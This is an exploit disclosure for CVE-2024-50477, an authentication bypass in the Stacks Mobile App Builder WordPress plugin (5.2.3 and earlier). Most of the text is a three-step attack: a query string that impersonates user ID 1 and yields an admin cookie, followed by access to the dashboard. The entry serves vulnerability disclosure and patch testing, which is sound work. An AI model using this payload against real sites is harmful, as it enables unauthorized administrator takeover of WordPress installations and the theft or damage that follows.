# Exploit Title: Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover # Date: October 25, 2024 # Exploit Author: stealthcopter # Vendor Homepage: https://stacksmarket.co/ # Software Link: https://wordpress.org/plugins/stacks-mobile-app-builder/ # Version: <= 5.2.3 # Tested on: Ubuntu 24.10/Docker # CVE: CVE-2024-50477 # References: # - https://github.com/stealthcopter/wordpress-hacking/blob/main/reports/stacks-mobile-app-builder-priv-esc/stacks-mobile-app-builder-priv-esc.md # - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/stacks-mobile-app-builder/stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover 1. Navigate to the target site and append the following query parameters to the URL to impersonate the user with ID `1`: `/?mobile_co=1&uid=1` 2. You will now receive an authentication cookie for the specified user ID (typically, user ID `1` is the site administrator). 3. Visit `/wp-admin` — you should have full access to the admin dashboard.